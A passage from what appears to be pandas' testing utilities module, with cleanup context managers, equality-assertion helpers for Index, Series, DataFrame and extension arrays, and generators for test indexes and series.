if os.path.exists(filename):
os.remove(filename)
except OSError as e:
print("Exception on removing file: {error}".format(error=e))
@contextmanager
def ensure_clean_dir():
"""
Get a temporary directory path and agrees to remove on close.
Yields
------
Temporary directory path
"""
directory_name = tempfile.mkdtemp(suffix="")
try:
yield directory_name
finally:
try:
rmtree(directory_name)
except OSError:
pass
@contextmanager
def ensure_safe_environment_variables():
"""
Get a context manager to safely set environment variables
All changes will be undone on close, hence environment variables set
within this contextmanager will neither persist nor change global state.
"""
saved_environ = dict(os.environ)
try:
yield
finally:
os.environ.clear()
os.environ.update(saved_environ)
# -----------------------------------------------------------------------------
# Comparators
def equalContents(arr1, arr2):
"""Checks if the set of unique elements of arr1 and arr2 are equivalent.
"""
return frozenset(arr1) == frozenset(arr2)
def assert_index_equal(
left: Index,
right: Index,
exact: Union[bool, str] = "equiv",
check_names: bool = True,
check_less_precise: Union[bool, int] = False,
check_exact: bool = True,
check_categorical: bool = True,
obj: str = "Index",
) -> None:
"""
Check that left and right Index are equal.
Parameters
----------
left : Index
right : Index
exact : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical. If 'equiv', then RangeIndex can be substituted for
Int64Index as well.
check_names : bool, default True
Whether to check the names attribute.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
check_exact : bool, default True
Whether to compare number exactly.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
obj : str, default 'Index'
Specify object name being compared, internally used to show appropriate
assertion message.
"""
__tracebackhide__ = True
def _check_types(l, r, obj="Index"):
if exact:
assert_class_equal(l, r, exact=exact, obj=obj)
# Skip exact dtype checking when `check_categorical` is False
if check_categorical:
assert_attr_equal("dtype", l, r, obj=obj)
# allow string-like to have different inferred_types
if l.inferred_type in ("string", "unicode"):
assert r.inferred_type in ("string", "unicode")
else:
assert_attr_equal("inferred_type", l, r, obj=obj)
def _get_ilevel_values(index, level):
# accept level number only
unique = index.levels[level]
labels = index.codes[level]
filled = take_1d(unique.values, labels, fill_value=unique._na_value)
values = unique._shallow_copy(filled, name=index.names[level])
return values
# instance validation
_check_isinstance(left, right, Index)
# class / dtype comparison
_check_types(left, right, obj=obj)
# level comparison
if left.nlevels != right.nlevels:
msg1 = "{obj} levels are different".format(obj=obj)
msg2 = "{nlevels}, {left}".format(nlevels=left.nlevels, left=left)
msg3 = "{nlevels}, {right}".format(nlevels=right.nlevels, right=right)
raise_assert_detail(obj, msg1, msg2, msg3)
# length comparison
if len(left) != len(right):
msg1 = "{obj} length are different".format(obj=obj)
msg2 = "{length}, {left}".format(length=len(left), left=left)
msg3 = "{length}, {right}".format(length=len(right), right=right)
raise_assert_detail(obj, msg1, msg2, msg3)
# MultiIndex special comparison for little-friendly error messages
if left.nlevels > 1:
left = cast(MultiIndex, left)
right = cast(MultiIndex, right)
for level in range(left.nlevels):
# cannot use get_level_values here because it can change dtype
llevel = _get_ilevel_values(left, level)
rlevel = _get_ilevel_values(right, level)
lobj = "MultiIndex level [{level}]".format(level=level)
assert_index_equal(
llevel,
rlevel,
exact=exact,
check_names=check_names,
check_less_precise=check_less_precise,
check_exact=check_exact,
obj=lobj,
)
# get_level_values may change dtype
_check_types(left.levels[level], right.levels[level], obj=obj)
# skip exact index checking when `check_categorical` is False
if check_exact and check_categorical:
if not left.equals(right):
diff = np.sum((left.values != right.values).astype(int)) * 100.0 / len(left)
msg = "{obj} values are different ({pct} %)".format(
obj=obj, pct=np.round(diff, 5)
)
raise_assert_detail(obj, msg, left, right)
else:
_testing.assert_almost_equal(
left.values,
right.values,
check_less_precise=check_less_precise,
check_dtype=exact,
obj=obj,
lobj=left,
robj=right,
)
# metadata comparison
if check_names:
assert_attr_equal("names", left, right, obj=obj)
if isinstance(left, pd.PeriodIndex) or isinstance(right, pd.PeriodIndex):
assert_attr_equal("freq", left, right, obj=obj)
if isinstance(left, pd.IntervalIndex) or isinstance(right, pd.IntervalIndex):
assert_interval_array_equal(left.values, right.values)
if check_categorical:
if is_categorical_dtype(left) or is_categorical_dtype(right):
assert_categorical_equal(
left.values, right.values, obj="{obj} category".format(obj=obj)
)
def assert_class_equal(left, right, exact=True, obj="Input"):
"""checks classes are equal."""
__tracebackhide__ = True
def repr_class(x):
if isinstance(x, Index):
# return Index as it is to include values in the error message
return x
try:
return x.__class__.__name__
except AttributeError:
return repr(type(x))
if exact == "equiv":
if type(left) != type(right):
# allow equivalence of Int64Index/RangeIndex
types = {type(left).__name__, type(right).__name__}
if len(types - {"Int64Index", "RangeIndex"}):
msg = "{obj} classes are not equivalent".format(obj=obj)
raise_assert_detail(obj, msg, repr_class(left), repr_class(right))
elif exact:
if type(left) != type(right):
msg = "{obj} classes are different".format(obj=obj)
raise_assert_detail(obj, msg, repr_class(left), repr_class(right))
def assert_attr_equal(attr, left, right, obj="Attributes"):
"""checks attributes are equal. Both objects must have attribute.
Parameters
----------
attr : str
Attribute name being compared.
left : object
right : object
obj : str, default 'Attributes'
Specify object name being compared, internally used to show appropriate
assertion message
"""
__tracebackhide__ = True
left_attr = getattr(left, attr)
right_attr = getattr(right, attr)
if left_attr is right_attr:
return True
elif (
is_number(left_attr)
and np.isnan(left_attr)
and is_number(right_attr)
and np.isnan(right_attr)
):
# np.nan
return True
try:
result = left_attr == right_attr
except TypeError:
# datetimetz on rhs may raise TypeError
result = False
if not isinstance(result, bool):
result = result.all()
if result:
return True
else:
msg = 'Attribute "{attr}" are different'.format(attr=attr)
raise_assert_detail(obj, msg, left_attr, right_attr)
def assert_is_valid_plot_return_object(objs):
import matplotlib.pyplot as plt
if isinstance(objs, (pd.Series, np.ndarray)):
for el in objs.ravel():
msg = (
"one of 'objs' is not a matplotlib Axes instance, type "
"encountered {name!r}"
).format(name=el.__class__.__name__)
assert isinstance(el, (plt.Axes, dict)), msg
else:
assert isinstance(objs, (plt.Artist, tuple, dict)), (
"objs is neither an ndarray of Artist instances nor a "
'single Artist instance, tuple, or dict, "objs" is a {name!r}'.format(
name=objs.__class__.__name__
)
)
def isiterable(obj):
return hasattr(obj, "__iter__")
def assert_is_sorted(seq):
"""Assert that the sequence is sorted."""
if isinstance(seq, (Index, Series)):
seq = seq.values
# sorting does not change precisions
assert_numpy_array_equal(seq, np.sort(np.array(seq)))
def assert_categorical_equal(
left, right, check_dtype=True, check_category_order=True, obj="Categorical"
):
"""Test that Categoricals are equivalent.
Parameters
----------
left : Categorical
right : Categorical
check_dtype : bool, default True
Check that integer dtype of the codes are the same
check_category_order : bool, default True
Whether the order of the categories should be compared, which
implies identical integer codes. If False, only the resulting
values are compared. The ordered attribute is
checked regardless.
obj : str, default 'Categorical'
Specify object name being compared, internally used to show appropriate
assertion message
"""
_check_isinstance(left, right, Categorical)
if check_category_order:
assert_index_equal(
left.categories, right.categories, obj="{obj}.categories".format(obj=obj)
)
assert_numpy_array_equal(
left.codes,
right.codes,
check_dtype=check_dtype,
obj="{obj}.codes".format(obj=obj),
)
else:
assert_index_equal(
left.categories.sort_values(),
right.categories.sort_values(),
obj="{obj}.categories".format(obj=obj),
)
assert_index_equal(
left.categories.take(left.codes),
right.categories.take(right.codes),
obj="{obj}.values".format(obj=obj),
)
assert_attr_equal("ordered", left, right, obj=obj)
def assert_interval_array_equal(left, right, exact="equiv", obj="IntervalArray"):
"""Test that two IntervalArrays are equivalent.
Parameters
----------
left, right : IntervalArray
The IntervalArrays to compare.
exact : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical. If 'equiv', then RangeIndex can be substituted for
Int64Index as well.
obj : str, default 'IntervalArray'
Specify object name being compared, internally used to show appropriate
assertion message
"""
_check_isinstance(left, right, IntervalArray)
assert_index_equal(
left.left, right.left, exact=exact, obj="{obj}.left".format(obj=obj)
)
assert_index_equal(
left.right, right.right, exact=exact, obj="{obj}.left".format(obj=obj)
)
assert_attr_equal("closed", left, right, obj=obj)
def assert_period_array_equal(left, right, obj="PeriodArray"):
_check_isinstance(left, right, PeriodArray)
assert_numpy_array_equal(
left._data, right._data, obj="{obj}.values".format(obj=obj)
)
assert_attr_equal("freq", left, right, obj=obj)
def assert_datetime_array_equal(left, right, obj="DatetimeArray"):
__tracebackhide__ = True
_check_isinstance(left, right, DatetimeArray)
assert_numpy_array_equal(left._data, right._data, obj="{obj}._data".format(obj=obj))
assert_attr_equal("freq", left, right, obj=obj)
assert_attr_equal("tz", left, right, obj=obj)
def assert_timedelta_array_equal(left, right, obj="TimedeltaArray"):
__tracebackhide__ = True
_check_isinstance(left, right, TimedeltaArray)
assert_numpy_array_equal(left._data, right._data, obj="{obj}._data".format(obj=obj))
assert_attr_equal("freq", left, right, obj=obj)
def raise_assert_detail(obj, message, left, right, diff=None):
__tracebackhide__ = True
if isinstance(left, np.ndarray):
left = pprint_thing(left)
elif is_categorical_dtype(left):
left = repr(left)
if isinstance(right, np.ndarray):
right = pprint_thing(right)
elif is_categorical_dtype(right):
right = repr(right)
msg = """{obj} are different
{message}
[left]: {left}
[right]: {right}""".format(
obj=obj, message=message, left=left, right=right
)
if diff is not None:
msg += "\n[diff]: {diff}".format(diff=diff)
raise AssertionError(msg)
def assert_numpy_array_equal(
left,
right,
strict_nan=False,
check_dtype=True,
err_msg=None,
check_same=None,
obj="numpy array",
):
""" Checks that 'np.ndarray' is equivalent
Parameters
----------
left : np.ndarray or iterable
right : np.ndarray or iterable
strict_nan : bool, default False
If True, consider NaN and None to be different.
check_dtype: bool, default True
check dtype if both a and b are np.ndarray
err_msg : str, default None
If provided, used as assertion message
check_same : None|'copy'|'same', default None
Ensure left and right refer/do not refer to the same memory area
obj : str, default 'numpy array'
Specify object name being compared, internally used to show appropriate
assertion message
"""
__tracebackhide__ = True
# instance validation
# Show a detailed error message when classes are different
assert_class_equal(left, right, obj=obj)
# both classes must be an np.ndarray
_check_isinstance(left, right, np.ndarray)
def _get_base(obj):
return obj.base if getattr(obj, "base", None) is not None else obj
left_base = _get_base(left)
right_base = _get_base(right)
if check_same == "same":
if left_base is not right_base:
msg = "{left!r} is not {right!r}".format(left=left_base, right=right_base)
raise AssertionError(msg)
elif check_same == "copy":
if left_base is right_base:
msg = "{left!r} is {right!r}".format(left=left_base, right=right_base)
raise AssertionError(msg)
def _raise(left, right, err_msg):
if err_msg is None:
if left.shape != right.shape:
raise_assert_detail(
obj,
"{obj} shapes are different".format(obj=obj),
left.shape,
right.shape,
)
diff = 0
for l, r in zip(left, right):
# count up differences
if not array_equivalent(l, r, strict_nan=strict_nan):
diff += 1
diff = diff * 100.0 / left.size
msg = "{obj} values are different ({pct} %)".format(
obj=obj, pct=np.round(diff, 5)
)
raise_assert_detail(obj, msg, left, right)
raise AssertionError(err_msg)
# compare shape and values
if not array_equivalent(left, right, strict_nan=strict_nan):
_raise(left, right, err_msg)
if check_dtype:
if isinstance(left, np.ndarray) and isinstance(right, np.ndarray):
assert_attr_equal("dtype", left, right, obj=obj)
def assert_extension_array_equal(
left, right, check_dtype=True, check_less_precise=False, check_exact=False
):
"""Check that left and right ExtensionArrays are equal.
Parameters
----------
left, right : ExtensionArray
The two arrays to compare
check_dtype : bool, default True
Whether to check if the ExtensionArray dtypes are identical.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
check_exact : bool, default False
Whether to compare number exactly.
Notes
-----
Missing values are checked separately from valid values.
A mask of missing values is computed for each and checked to match.
The remaining all-valid values are cast to object dtype and checked.
"""
assert isinstance(left, ExtensionArray), "left is not an ExtensionArray"
assert isinstance(right, ExtensionArray), "right is not an ExtensionArray"
if check_dtype:
assert_attr_equal("dtype", left, right, obj="ExtensionArray")
if hasattr(left, "asi8") and type(right) == type(left):
# Avoid slow object-dtype comparisons
assert_numpy_array_equal(left.asi8, right.asi8)
return
left_na = np.asarray(left.isna())
right_na = np.asarray(right.isna())
assert_numpy_array_equal(left_na, right_na, obj="ExtensionArray NA mask")
left_valid = np.asarray(left[~left_na].astype(object))
right_valid = np.asarray(right[~right_na].astype(object))
if check_exact:
assert_numpy_array_equal(left_valid, right_valid, obj="ExtensionArray")
else:
_testing.assert_almost_equal(
left_valid,
right_valid,
check_dtype=check_dtype,
check_less_precise=check_less_precise,
obj="ExtensionArray",
)
# This could be refactored to use the NDFrame.equals method
def assert_series_equal(
left,
right,
check_dtype=True,
check_index_type="equiv",
check_series_type=True,
check_less_precise=False,
check_names=True,
check_exact=False,
check_datetimelike_compat=False,
check_categorical=True,
obj="Series",
):
"""
Check that left and right Series are equal.
Parameters
----------
left : Series
right : Series
check_dtype : bool, default True
Whether to check the Series dtype is identical.
check_index_type : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical.
check_series_type : bool, default True
Whether to check the Series class is identical.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
check_names : bool, default True
Whether to check the Series and Index names attribute.
check_exact : bool, default False
Whether to compare number exactly.
check_datetimelike_compat : bool, default False
Compare datetime-like which is comparable ignoring dtype.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
obj : str, default 'Series'
Specify object name being compared, internally used to show appropriate
assertion message.
"""
__tracebackhide__ = True
# instance validation
_check_isinstance(left, right, Series)
if check_series_type:
# ToDo: There are some tests using rhs is sparse
# lhs is dense. Should use assert_class_equal in future
assert isinstance(left, type(right))
# assert_class_equal(left, right, obj=obj)
# length comparison
if len(left) != len(right):
msg1 = "{len}, {left}".format(len=len(left), left=left.index)
msg2 = "{len}, {right}".format(len=len(right), right=right.index)
raise_assert_detail(obj, "Series length are different", msg1, msg2)
# index comparison
assert_index_equal(
left.index,
right.index,
exact=check_index_type,
check_names=check_names,
check_less_precise=check_less_precise,
check_exact=check_exact,
check_categorical=check_categorical,
obj="{obj}.index".format(obj=obj),
)
if check_dtype:
# We want to skip exact dtype checking when `check_categorical`
# is False. We'll still raise if only one is a `Categorical`,
# regardless of `check_categorical`
if (
is_categorical_dtype(left)
and is_categorical_dtype(right)
and not check_categorical
):
pass
else:
assert_attr_equal(
"dtype", left, right, obj="Attributes of {obj}".format(obj=obj)
)
if check_exact:
assert_numpy_array_equal(
left._internal_get_values(),
right._internal_get_values(),
check_dtype=check_dtype,
obj="{obj}".format(obj=obj),
)
elif check_datetimelike_compat:
# we want to check only if we have compat dtypes
# e.g. integer and M|m are NOT compat, but we can simply check
# the values in that case
if needs_i8_conversion(left) or needs_i8_conversion(right):
# datetimelike may have different objects (e.g. datetime.datetime
# vs Timestamp) but will compare equal
if not Index(left.values).equals(Index(right.values)):
msg = (
"[datetimelike_compat=True] {left} is not equal to {right}."
).format(left=left.values, right=right.values)
raise AssertionError(msg)
else:
assert_numpy_array_equal(
left._internal_get_values(),
right._internal_get_values(),
check_dtype=check_dtype,
)
elif is_interval_dtype(left) or is_interval_dtype(right):
assert_interval_array_equal(left.array, right.array)
elif is_extension_array_dtype(left.dtype) and is_datetime64tz_dtype(left.dtype):
# .values is an ndarray, but ._values is the ExtensionArray.
# TODO: Use .array
assert is_extension_array_dtype(right.dtype)
assert_extension_array_equal(left._values, right._values)
elif (
is_extension_array_dtype(left)
and not is_categorical_dtype(left)
and is_extension_array_dtype(right)
and not is_categorical_dtype(right)
):
assert_extension_array_equal(left.array, right.array)
else:
_testing.assert_almost_equal(
left._internal_get_values(),
right._internal_get_values(),
check_less_precise=check_less_precise,
check_dtype=check_dtype,
obj="{obj}".format(obj=obj),
)
# metadata comparison
if check_names:
assert_attr_equal("name", left, right, obj=obj)
if check_categorical:
if is_categorical_dtype(left) or is_categorical_dtype(right):
assert_categorical_equal(
left.values, right.values, obj="{obj} category".format(obj=obj)
)
# This could be refactored to use the NDFrame.equals method
def assert_frame_equal(
left,
right,
check_dtype=True,
check_index_type="equiv",
check_column_type="equiv",
check_frame_type=True,
check_less_precise=False,
check_names=True,
by_blocks=False,
check_exact=False,
check_datetimelike_compat=False,
check_categorical=True,
check_like=False,
obj="DataFrame",
):
"""
Check that left and right DataFrame are equal.
This function is intended to compare two DataFrames and output any
differences. Is is mostly intended for use in unit tests.
Additional parameters allow varying the strictness of the
equality checks performed.
Parameters
----------
left : DataFrame
First DataFrame to compare.
right : DataFrame
Second DataFrame to compare.
check_dtype : bool, default True
Whether to check the DataFrame dtype is identical.
check_index_type : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical.
check_column_type : bool or {'equiv'}, default 'equiv'
Whether to check the columns class, dtype and inferred_type
are identical. Is passed as the ``exact`` argument of
:func:`assert_index_equal`.
check_frame_type : bool, default True
Whether to check the DataFrame class is identical.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
check_names : bool, default True
Whether to check that the `names` attribute for both the `index`
and `column` attributes of the DataFrame is identical.
by_blocks : bool, default False
Specify how to compare internal data. If False, compare by columns.
If True, compare by blocks.
check_exact : bool, default False
Whether to compare number exactly.
check_datetimelike_compat : bool, default False
Compare datetime-like which is comparable ignoring dtype.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
check_like : bool, default False
If True, ignore the order of index & columns.
Note: index labels must match their respective rows
(same as in columns) - same labels must be with the same data.
obj : str, default 'DataFrame'
Specify object name being compared, internally used to show appropriate
assertion message.
See Also
--------
assert_series_equal : Equivalent method for asserting Series equality.
DataFrame.equals : Check DataFrame equality.
Examples
--------
This example shows comparing two DataFrames that are equal
but with columns of differing dtypes.
>>> from pandas.util.testing import assert_frame_equal
>>> df1 = pd.DataFrame({'a': [1, 2], 'b': [3, 4]})
>>> df2 = pd.DataFrame({'a': [1, 2], 'b': [3.0, 4.0]})
df1 equals itself.
>>> assert_frame_equal(df1, df1)
df1 differs from df2 as column 'b' is of a different type.
>>> assert_frame_equal(df1, df2)
Traceback (most recent call last):
...
AssertionError: Attributes of DataFrame.iloc[:, 1] are different
Attribute "dtype" are different
[left]: int64
[right]: float64
Ignore differing dtypes in columns with check_dtype.
>>> assert_frame_equal(df1, df2, check_dtype=False)
"""
__tracebackhide__ = True
# instance validation
_check_isinstance(left, right, DataFrame)
if check_frame_type:
assert isinstance(left, type(right))
# assert_class_equal(left, right, obj=obj)
# shape comparison
if left.shape != right.shape:
raise_assert_detail(
obj,
"{obj} shape mismatch".format(obj=obj),
"{shape!r}".format(shape=left.shape),
"{shape!r}".format(shape=right.shape),
)
if check_like:
left, right = left.reindex_like(right), right
# index comparison
assert_index_equal(
left.index,
right.index,
exact=check_index_type,
check_names=check_names,
check_less_precise=check_less_precise,
check_exact=check_exact,
check_categorical=check_categorical,
obj="{obj}.index".format(obj=obj),
)
# column comparison
assert_index_equal(
left.columns,
right.columns,
exact=check_column_type,
check_names=check_names,
check_less_precise=check_less_precise,
check_exact=check_exact,
check_categorical=check_categorical,
obj="{obj}.columns".format(obj=obj),
)
# compare by blocks
if by_blocks:
rblocks = right._to_dict_of_blocks()
lblocks = left._to_dict_of_blocks()
for dtype in list(set(list(lblocks.keys()) + list(rblocks.keys()))):
assert dtype in lblocks
assert dtype in rblocks
assert_frame_equal(
lblocks[dtype], rblocks[dtype], check_dtype=check_dtype, obj=obj
)
# compare by columns
else:
for i, col in enumerate(left.columns):
assert col in right
lcol = left.iloc[:, i]
rcol = right.iloc[:, i]
assert_series_equal(
lcol,
rcol,
check_dtype=check_dtype,
check_index_type=check_index_type,
check_less_precise=check_less_precise,
check_exact=check_exact,
check_names=check_names,
check_datetimelike_compat=check_datetimelike_compat,
check_categorical=check_categorical,
obj="{obj}.iloc[:, {idx}]".format(obj=obj, idx=i),
)
def assert_equal(left, right, **kwargs):
"""
Wrapper for tm.assert_*_equal to dispatch to the appropriate test function.
Parameters
----------
left : Index, Series, DataFrame, ExtensionArray, or np.ndarray
right : Index, Series, DataFrame, ExtensionArray, or np.ndarray
**kwargs
"""
__tracebackhide__ = True
if isinstance(left, pd.Index):
assert_index_equal(left, right, **kwargs)
elif isinstance(left, pd.Series):
assert_series_equal(left, right, **kwargs)
elif isinstance(left, pd.DataFrame):
assert_frame_equal(left, right, **kwargs)
elif isinstance(left, IntervalArray):
assert_interval_array_equal(left, right, **kwargs)
elif isinstance(left, PeriodArray):
assert_period_array_equal(left, right, **kwargs)
elif isinstance(left, DatetimeArray):
assert_datetime_array_equal(left, right, **kwargs)
elif isinstance(left, TimedeltaArray):
assert_timedelta_array_equal(left, right, **kwargs)
elif isinstance(left, ExtensionArray):
assert_extension_array_equal(left, right, **kwargs)
elif isinstance(left, np.ndarray):
assert_numpy_array_equal(left, right, **kwargs)
elif isinstance(left, str):
assert kwargs == {}
return left == right
else:
raise NotImplementedError(type(left))
def box_expected(expected, box_cls, transpose=True):
"""
Helper function to wrap the expected output of a test in a given box_class.
Parameters
----------
expected : np.ndarray, Index, Series
box_cls : {Index, Series, DataFrame}
Returns
-------
subclass of box_cls
"""
if box_cls is pd.Index:
expected = pd.Index(expected)
elif box_cls is pd.Series:
expected = pd.Series(expected)
elif box_cls is pd.DataFrame:
expected = pd.Series(expected).to_frame()
if transpose:
# for vector operations, we we need a DataFrame to be a single-row,
# not a single-column, in order to operate against non-DataFrame
# vectors of the same length.
expected = expected.T
elif box_cls is PeriodArray:
# the PeriodArray constructor is not as flexible as period_array
expected = period_array(expected)
elif box_cls is DatetimeArray:
expected = DatetimeArray(expected)
elif box_cls is TimedeltaArray:
expected = TimedeltaArray(expected)
elif box_cls is np.ndarray:
expected = np.array(expected)
elif box_cls is to_array:
expected = to_array(expected)
else:
raise NotImplementedError(box_cls)
return expected
def to_array(obj):
# temporary implementation until we get pd.array in place
if is_period_dtype(obj):
return period_array(obj)
elif is_datetime64_dtype(obj) or is_datetime64tz_dtype(obj):
return DatetimeArray._from_sequence(obj)
elif is_timedelta64_dtype(obj):
return TimedeltaArray._from_sequence(obj)
else:
return np.array(obj)
# -----------------------------------------------------------------------------
# Sparse
def assert_sp_array_equal(
left,
right,
check_dtype=True,
check_kind=True,
check_fill_value=True,
consolidate_block_indices=False,
):
"""Check that the left and right SparseArray are equal.
Parameters
----------
left : SparseArray
right : SparseArray
check_dtype : bool, default True
Whether to check the data dtype is identical.
check_kind : bool, default True
Whether to just the kind of the sparse index for each column.
check_fill_value : bool, default True
Whether to check that left.fill_value matches right.fill_value
consolidate_block_indices : bool, default False
Whether to consolidate contiguous blocks for sparse arrays with
a BlockIndex. Some operations, e.g. concat, will end up with
block indices that could be consolidated. Setting this to true will
create a new BlockIndex for that array, with consolidated
block indices.
"""
_check_isinstance(left, right, pd.SparseArray)
assert_numpy_array_equal(left.sp_values, right.sp_values, check_dtype=check_dtype)
# SparseIndex comparison
assert isinstance(left.sp_index, pd._libs.sparse.SparseIndex)
assert isinstance(right.sp_index, pd._libs.sparse.SparseIndex)
if not check_kind:
left_index = left.sp_index.to_block_index()
right_index = right.sp_index.to_block_index()
else:
left_index = left.sp_index
right_index = right.sp_index
if consolidate_block_indices and left.kind == "block":
# we'll probably remove this hack...
left_index = left_index.to_int_index().to_block_index()
right_index = right_index.to_int_index().to_block_index()
if not left_index.equals(right_index):
raise_assert_detail(
"SparseArray.index", "index are not equal", left_index, right_index
)
else:
# Just ensure a
pass
if check_fill_value:
assert_attr_equal("fill_value", left, right)
if check_dtype:
assert_attr_equal("dtype", left, right)
assert_numpy_array_equal(left.to_dense(), right.to_dense(), check_dtype=check_dtype)
# -----------------------------------------------------------------------------
# Others
def assert_contains_all(iterable, dic):
for k in iterable:
assert k in dic, "Did not contain item: '{key!r}'".format(key=k)
def assert_copy(iter1, iter2, **eql_kwargs):
"""
iter1, iter2: iterables that produce elements
comparable with assert_almost_equal
Checks that the elements are equal, but not
the same object. (Does not check that items
in sequences are also not the same object)
"""
for elem1, elem2 in zip(iter1, iter2):
assert_almost_equal(elem1, elem2, **eql_kwargs)
msg = (
"Expected object {obj1!r} and object {obj2!r} to be "
"different objects, but they were the same object."
).format(obj1=type(elem1), obj2=type(elem2))
assert elem1 is not elem2, msg
def getCols(k):
return string.ascii_uppercase[:k]
# make index
def makeStringIndex(k=10, name=None):
return Index(rands_array(nchars=10, size=k), name=name)
def makeUnicodeIndex(k=10, name=None):
return Index(randu_array(nchars=10, size=k), name=name)
def makeCategoricalIndex(k=10, n=3, name=None, **kwargs):
""" make a length k index or n categories """
x = rands_array(nchars=4, size=n)
return CategoricalIndex(
Categorical.from_codes(np.arange(k) % n, categories=x), name=name, **kwargs
)
def makeIntervalIndex(k=10, name=None, **kwargs):
""" make a length k IntervalIndex """
x = np.linspace(0, 100, num=(k + 1))
return IntervalIndex.from_breaks(x, name=name, **kwargs)
def makeBoolIndex(k=10, name=None):
if k == 1:
return Index([True], name=name)
elif k == 2:
return Index([False, True], name=name)
return Index([False, True] + [False] * (k - 2), name=name)
def makeIntIndex(k=10, name=None):
return Index(list(range(k)), name=name)
def makeUIntIndex(k=10, name=None):
return Index([2 ** 63 + i for i in range(k)], name=name)
def makeRangeIndex(k=10, name=None, **kwargs):
return RangeIndex(0, k, 1, name=name, **kwargs)
def makeFloatIndex(k=10, name=None):
values = sorted(np.random.random_sample(k)) - np.random.random_sample(1)
return Index(values * (10 ** np.random.randint(0, 9)), name=name)
def makeDateIndex(k=10, freq="B", name=None, **kwargs):
dt = datetime(2000, 1, 1)
dr = bdate_range(dt, periods=k, freq=freq, name=name)
return DatetimeIndex(dr, name=name, **kwargs)
def makeTimedeltaIndex(k=10, freq="D", name=None, **kwargs):
return pd.timedelta_range(start="1 day", periods=k, freq=freq, name=name, **kwargs)
def makePeriodIndex(k=10, name=None, **kwargs):
dt = datetime(2000, 1, 1)
dr = pd.period_range(start=dt, periods=k, freq="B", name=name, **kwargs)
return dr
def makeMultiIndex(k=10, names=None, **kwargs):
return MultiIndex.from_product((("foo", "bar"), (1, 2)), names=names, **kwargs)
_names = [
"Alice",
"Bob",
"Charlie",
"Dan",
"Edith",
"Frank",
"George",
"Hannah",
"Ingrid",
"Jerry",
"Kevin",
"Laura",
"Michael",
"Norbert",
"Oliver",
"Patricia",
"Quinn",
"Ray",
"Sarah",
"Tim",
"Ursula",
"Victor",
"Wendy",
"Xavier",
"Yvonne",
"Zelda",
]
def _make_timeseries(start="2000-01-01", end="2000-12-31", freq="1D", seed=None):
"""
Make a DataFrame with a DatetimeIndex
Parameters
----------
start : str or Timestamp, default "2000-01-01"
The start of the index. Passed to date_range with `freq`.
end : str or Timestamp, default "2000-12-31"
The end of the index. Passed to date_range with `freq`.
freq : str or Freq
The frequency to use for the DatetimeIndex
seed : int, optional
The random state seed.
* name : object dtype with string names
* id : int dtype with
* x, y : float dtype
Examples
--------
>>> _make_timeseries()
id name x y
timestamp
2000-01-01 982 Frank 0.031261 0.986727
2000-01-02 1025 Edith -0.086358 -0.032920
2000-01-03 982 Edith 0.473177 0.298654
2000-01-04 1009 Sarah 0.534344 -0.750377
2000-01-05 963 Zelda -0.271573 0.054424
... ... ... ... ...
2000-12-27 980 Ingrid -0.132333 -0.422195
2000-12-28 972 Frank -0.376007 -0.298687
2000-12-29 1009 Ursula -0.865047 -0.503133
2000-12-30 1000 Hannah -0.063757 -0.507336
2000-12-31 972 Tim -0.869120 0.531685
"""
index = pd.date_range(start=start, end=end, freq=freq, name="timestamp")
n = len(index)
state = np.random.RandomState(seed)
columns = {
"name": state.choice(_names, size=n),
"id": state.poisson(1000, size=n),
"x": state.rand(n) * 2 - 1,
"y": state.rand(n) * 2 - 1,
}
df = pd.DataFrame(columns, index=index, columns=sorted(columns))
if df.index[-1] == end:
df = df.iloc[:-1]
return df
def all_index_generator(k=10):
"""Generator which can be iterated over to get instances of all the various
index classes.
Parameters
----------
k: length of each of the index instances
"""
all_make_index_funcs = [
makeIntIndex,
makeFloatIndex,
makeStringIndex,
makeUnicodeIndex,
makeDateIndex,
makePeriodIndex,
makeTimedeltaIndex,
makeBoolIndex,
makeRangeIndex,
makeIntervalIndex,
makeCategoricalIndex,
]
for make_index_func in all_make_index_funcs:
yield make_index_func(k=k)
def index_subclass_makers_generator():
make_index_funcs = [
makeDateIndex,
makePeriodIndex,
makeTimedeltaIndex,
makeRangeIndex,
makeIntervalIndex,
makeCategoricalIndex,
makeMultiIndex,
]
for make_index_func in make_index_funcs:
yield make_index_func
def all_timeseries_index_generator(k=10):
"""Generator which can be iterated over to get instances of all the classes
which represent time-series.
Parameters
----------
k: length of each of the index instances
"""
make_index_funcs = [makeDateIndex, makePeriodIndex, makeTimedeltaIndex]
for make_index_func in make_index_funcs:
yield make_index_func(k=k)
# make series
def makeFloatSeries(name=None):
index = makeStringIndex(N)
return Series(randn(N), index=index, name=name)
def makeStringSeries(name=None):
index = makeStringIndex(N)
return Series(randn(N), index=index, name=name)
def makeObjectSeries(name=None):
data = makeStringIndex(N)
data = Index(data, dtype=object)
index = makeStringIndex(N)
return Series(data, index=index, name=name)
def getSeriesData():
index = makeStringIndex(N)
return {c: Series(randn(N), index=index) for c in getCols(K)}
def makeTimeSeries(nper=None, freq="B", name=None):
if nper is None:
nper = N
return Series(randn(nper), index=makeDateIndex(nper, freq=freq), name=name)
def makePeriodSeries(nper=None, name=None):
if nper is None:
nper = N
